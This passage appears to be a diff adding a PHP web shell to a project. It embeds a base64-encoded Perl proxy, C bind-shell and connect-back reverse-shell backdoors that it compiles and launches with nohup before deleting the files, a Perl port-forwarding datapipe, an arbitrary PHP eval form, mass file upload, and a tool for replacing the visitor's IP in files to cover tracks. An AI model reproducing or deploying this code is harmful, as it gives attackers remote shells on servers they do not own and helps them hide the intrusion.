tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
+unlink("/tmp/nst_perl_proxy.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_proxy_tmp");
+$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
+unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
+rmdir(".nst_proxy_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_proxy
+
+if($_POST['c_bd']){
+$port=$_POST['port'];
+$c_bd_scp = "#define PORT $port
+#include <stdio.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
+struct sockaddr_in serv_addr;
+struct sockaddr_in client_addr;
+
+int main ()
+{
+    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (soc_des == -1)
+        exit(-1);
+    bzero((char *) &serv_addr, sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    serv_addr.sin_port = htons(PORT);
+    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
+    if (soc_rc != 0)
+        exit(-1);
+    if (fork() != 0)
+        exit(0);
+    setpgrp();
+    signal(SIGHUP, SIG_IGN);
+    if (fork() != 0)
+        exit(0);
+    soc_rc = listen(soc_des, 5);
+    if (soc_rc != 0)
+        exit(0);
+    while (1) {
+        soc_len = sizeof(client_addr);
+        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
+        if (soc_cli < 0)
+            exit(0);
+        cli_pid = getpid();
+        server_pid = fork();
+        if (server_pid != 0) {
+            dup2(soc_cli,0);
+            dup2(soc_cli,1);
+            dup2(soc_cli,2);
+            execl(\"/bin/sh\",\"sh\",(char *)0);
+            close(soc_cli);
+            exit(0);
+        }
+    close(soc_cli);
+    }
+}
+
+";
+
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
+passthru("nohup /tmp/nst_bd &");
+unlink("/tmp/nst_c_bd.c");
+unlink("/tmp/nst_bd");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
+passthru("nohup .nst_bd_tmp/nst_bd &");
+unlink(".nst_bd_tmp/nst_bd");
+unlink(".nst_bd_tmp/nst_c_bd.c");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of c bd
+
+
+if($_POST['bc_c']){ # nc -l -p 4500
+$port_c = $_POST['port_c'];
+$ip=$_POST['ip'];
+$bc_c_scp = "#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+
+int fd, sock;
+int port = $port_c;
+struct sockaddr_in addr;
+
+char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
+char shell[] = \"/bin/sh\";
+
+int main(int argc, char *argv[]) {
+        while(argc<2) {
+        fprintf(stderr, \" %s <ip> \", argv[0]);
+        exit(0); }
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(port);
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+fd = socket(AF_INET, SOCK_STREAM, 0);
+connect(fd, (struct sockaddr*)&addr, sizeof(addr));
+
+send(fd, mesg, sizeof(mesg), 0);
+
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+execl(shell, \"in.telnetd\", 0);
+
+close(fd);
+return 1;
+}
+
+";
+
+if(is_writable("/tmp")){
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
+$fp=fopen("/tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
+passthru("nohup /tmp/nst_bc_c $ip &");
+unlink("/tmp/nst_bc_c");
+unlink("/tmp/nst_bc_c.c");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bc_c_tmp");
+$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
+passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
+unlink(".nst_bc_c_tmp/nst_bc_c.c");
+unlink(".nst_bc_c_tmp/nst_bc_c");
+rmdir(".nst_bc_c_tmp");
+}
+}
+$show_ps="1";
+
+}#end of back connect C
+
+
+if($_POST['datapipe_pl']){
+$port_2=$_POST['port_2'];
+$port_3=$_POST['port_3'];
+$ip=$_POST['ip'];
+$datapipe_pl = "
+#!/usr/bin/perl
+# coded by CuTTer (rus hacker)
+use IO::Socket;
+use POSIX;
+
+\$localport=$port_2;
+\$host=\"$ip\";
+\$port=$port_3;
+
+\$daemon=1;
+
+\$DIR = undef;
+
+## Âûâîäèòü ëîã ñîáûòèé (1-äà, 0-íåò)
+\$log=0;
+
+
+
+
+\$| = 1;
+
+if (\$daemon){
+        print \"3anycKaeM daemon\n\";
+
+        \$pid = fork;
+        exit if \$pid;
+        die \"Couldn't fork: \$!\" unless defined(\$pid);
+        POSIX::setsid() or die \"Can't start a new session: \$!\";
+}
+
+%o = ('port' => \$localport,
+          'toport' => \$port,
+          'tohost' => \$host);
+
+\$ah = IO::Socket::INET->new(
+                         'LocalPort' => \$localport,
+                         'Reuse' => 1,
+                         'Listen' => 10)
+    || die \"Íåëüçÿ îòêðûòü ñîêåò äëÿ ñîåäèíåíèé: \$!\";
+
+print \"Íà÷èíàåì âûïîëíåíèÿ öèêëà.\n\" if \$log;
+\$SIG{'CHLD'} = 'IGNORE';
+\$num = 0;
+while (1) {
+        \$ch = \$ah->accept();
+        if (!\$ch) {
+                print STDERR \"Ïðåðâàíî âûïîëåíèå accept: \$!\n\";
+                next;
+        }
+
+        printf(\"Íîâûé êëèåíò: host %s, port %s.\n\",
+        \$ch->peerhost(), \$ch->peerport()) if \$log;
+        ++\$num;
+        \$pid = fork();
+        if (!defined(\$pid)) {
+                print STDERR \"Íåâîçìîæíî âûïîëíèòü fork: \$!\n\";
+    } elsif (\$pid == 0) {
+## Íîâûé ïðîöåññ
+                \$ah->close();
+                Run(\%o, \$ch, \$num);
+        } else {
+                print \"Parent: Fork ïðîøåë óñïåøíî, çàêðûâàåì ñîêåò.\n\" if \$log;
+                \$ch->close();
+        }
+}
+
+
+sub Run {
+        my(\$o, \$ch, \$num) = @_;
+        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
+                                                        'PeerPort' => \$o->{'toport'});
+        print(\"Child: Äåëàåì ðåäèðåêò íà \$o->{'tohost'}, ïîðò \$o->{'toport'}.\n\") if \$log;
+        if (!\$th) {
+                printf STDERR (\"Child: Ïðåðâàí ðåäèðåêò íà %s, ïîðò %s.\n\",
+                \$o->{'tohost'}, \$o->{'toport'});
+                exit 0;
+        }
+
+        my \$fh;
+        if (\$o->{'dir'}) {
+                \$fh = Symbol::gensym();
+                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
+                or die \"Child: Ïðåðâàíî ñîçäàíèå ëîã ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\";
+        }
+
+        \$ch->autoflush();
+        \$th->autoflush();
+        while (\$ch || \$th) {
+                print \"Child: Âêëþ÷àåì öèêë.\n\" if \$log;
+                my \$rin = \"\";
+                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
+                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
+                my(\$rout, \$eout);
+                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
+                if (!\$rout  &&  !\$eout) {
+                        print STDERR \"Child: Îøèáêà Timeout.\n\";
+                }
+                my \$cbuffer = \"\";
+                my \$tbuffer = \"\";
+
+                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
+                        print \"Child: Æäåì äàííûõ îò êëèåíòà.\n\" if \$log;
+                        my \$result = sysread(\$ch, \$tbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Îøèáêà ïðè ñ÷èòûâàíèè äàííûõ êëèåíòà: \$!\n\";
+                                exit 0;
+                        }
+                        if (\$result == 0) {
+                                print \"Child: Êëèåíò îòñîåäèíèëñÿ.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+                }
+
+                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
+                        print \"Child: Æäåì äàííûõ.\n\" if \$log;
+                        my \$result = sysread(\$th, \$cbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Íåâîçìîæíî ñ÷èòàòü äàííûå: \$!\n\";
+                                exit 0;
+                        }
+
+                        if (\$result == 0) {
+                                print \"Child: Ïðîèçîøëî îòñîåäèíåíèå.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+            }
+
+                if (\$fh  &&  \$tbuffer) {
+                        (print \$fh \$tbuffer);
+                }
+
+                while (my \$len = length(\$tbuffer)) {
+                        print \"Child: Îòïðàâëÿåì \$len áàéò.\n\" if \$log;
+                        my \$res = syswrite(\$th, \$tbuffer, \$len);
+                        print \"Child: Äàííûå îòïðàâëåíû.\n\" if \$log;
+                        if (\$res > 0) {
+                                \$tbuffer = substr(\$tbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\";
+                        }
+                }
+
+                while (my \$len = length(\$cbuffer)) {
+                        print \"Child: Îòïðàâëÿåì \$len áàéò êëèåíòó.\n\" if \$log;
+                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
+                        print \"Child: Äàííûå îòïðàâëåíû..\n\" if \$log;
+                        if (\$res > 0) {
+                                \$cbuffer = substr(\$cbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\";
+                        }
+                }
+        }
+}
+
+";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
+unlink("/tmp/nst_perl_datapipe.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_datapipe_tmp");
+$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
+unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
+rmdir(".nst_datapipe_tmp");
+}
+}
+$show_ps="1";
+
+}#end of datapipe perl
+
+
+
+
+
+if($show_ps=="1"){
+print "<center><b>[ps ux]</b></center><br><br>";
+print "<pre>";
+passthru("ps ux");
+print "</pre><br><br>";
+}
+
+
+
+echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
+<Br>
+md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>]
+</form>
+";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
+echo "<br>
+<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
+Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post><b>DES:</b><br><input name=des size=30><br>
+John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
+
+print "
+<b>eval:</b<br>
+(example: print \"Hello World\";)
+<form method=post>
+<font color=red><b>&lt;?</b><br>
+<textarea name=eval rows=15 cols=113></textarea><br>
+<b>?&gt;</b></font><br>
+<input type=submit value=Run style='width:150px;'>
+</form><br>
+";
+
+function eval_sl($editf){
+if(get_magic_quotes_gpc()==1){
+$editf=stripslashes($editf);
+}
+return $editf;
+}
+
+
+if($_POST['eval']){
+print "<b>RESULT:<br><br></b>";
+eval(eval_sl($_POST['eval']));
+print "<br><br>";
+
+print "<font color=green><b>PHP:</b><br>\r\n\r\n";
+print "&lt;?\r\n";
+print "<br>";
+print htmlspecialchars(eval_sl(($_POST['eval'])));
+print "<br>";
+print "?&gt;\r\n\r\n</font><br><br>";
+
+}
+
+echo $copyr;
+exit;}
+
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+Replace tool:<br>
+(You can replace any text)<br>
+File: $de<br>
+<form method=post>
+1. Your ip.<br>
+2. microsoft.com ip :)<br>
+Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Replace>
+</form>
+";
+
+if(@$_POST['doit']){
+@$thisX=$_POST['thisX'];
+@$bythis=$_POST['bythis'];
+@$e=$_GET['e'];
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$thisX","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$thisX Replaced by $bythis<br>
+[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="upload"){
+echo "<br>
+<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
+File upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text size=50><br>
+<input name=where size=52 value='$d'><br>
+New file name:<br>
+<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
+<input type=submit value=Upload name=uploadf>
+</form><br>
+";
+
+if(@$_POST['uploadf']){
+$where=$_POST['where'];
+$newf=$_POST['newf'];
+$where=str_replace("//","/",$where);
+if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
+$uploadfile = "$where/".$newf;
+if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
+$uploadfile=str_replace("//","/",$uploadfile);
+echo "<i><br>Uploaded to $uploadfile</i><br>";
+}else{
+echo "<i><br>Error</i><br>";}
+}
+}
+
+if(@$_GET['t']=="massupload"){
+echo "
+Mass upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$d'><br>
+<input type=submit value=Upload name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
